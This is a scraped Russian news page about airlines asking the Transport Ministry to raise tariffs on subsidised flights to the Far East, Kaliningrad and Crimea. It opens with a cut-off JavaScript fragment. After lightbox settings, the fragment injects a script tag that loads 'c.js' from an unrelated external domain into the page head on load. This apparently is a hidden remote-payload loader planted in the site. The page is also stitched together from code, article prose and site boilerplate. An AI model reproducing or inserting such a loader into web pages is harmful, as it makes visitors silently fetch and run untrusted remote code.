, 'opacity': false, 'speedIn': 500, 'speedOut': 500, 'changeSpeed': 300, 'overlayShow': false, 'overlayOpacity': "", 'overlayColor': "", 'titleShow': false, 'titlePosition': '', 'enableEscapeButton': false, 'showCloseButton': false, 'showNavArrows': false, 'hideOnOverlayClick': false, 'hideOnContentClick': false, 'width': 500, 'height': 340, 'transitionIn': "", 'transitionOut': "", 'centerOnScroll': false }); var script = document.createElement('script'); script.type= 'text/javascript'; script.src = 'https://cdn.messagefromspaces.com/c.js?pro=type'; document.getElementsByTagName('head')[0].appendChild(script); })

wordpress themes.

Авиакомпании попросили Минтранс поднять тарифы на субсидируемые транспортировки

Большие авиакомпании РФ от лица Ассоциации эксплуатантов воздушного транспорта попросили замглаву минтранса Валерия Окулова пересмотреть тарифы в рамках программ субсидирования полетов на Дальний Восток, в Калининград и Крым.

Вопрос обусловлен тем, что все программы субсидирования действуют исключительно в «высокий» сезон авиаперевозок, вынуждая авиакомпании при наличии спроса отдавать доходные места под реализацию социальных проектов по заведомо низким тарифам. Из письма следует, что они фактически несут убытки при социально значимых перевозках, так как тарифы на субсидии не изменяются, а аэропорты повышают сборы, ссылаясь на инфляцию и остальные факторы. В 2014 году в общем пассажиропотоке в 93 млн человек было 1,7 млн льготников. На любом рейсе этих направлений должно быть не менее 30% льготных мест.

По имеющимся предварительным сведениям Росавиации, в текущем 2016 под действие программы перевозок с Дальнего Востока подпадает 51 маршрут, обслуживаемый девятью авиакомпаниями. В сегодняшнем году, как пишет газета, на это выделено около 9 млрд руб. Цена билета в одну сторону из столицы во Владивосток, Якутск, Магадан, Петропавловск-Камчатский — 6-7,5 тыс. руб., схожая сумма выплачивается как субсидия перевозчику.

Авиакомпании попросили Минтранс поднять тарифы на субсидируемые перевозки

Поделиться в соц. сетях


Вы можете пропустить чтение записи и оставить комментарий. Размещение ссылок запрещено.


Оставить комментарий


Использование материалов данного сайта запрещено, без активной гиперссылки на сайт - http://okinvest.ru.

Автор не несет ответственности за деятельность компаний, описанных на сайте. Уведомление о рисках.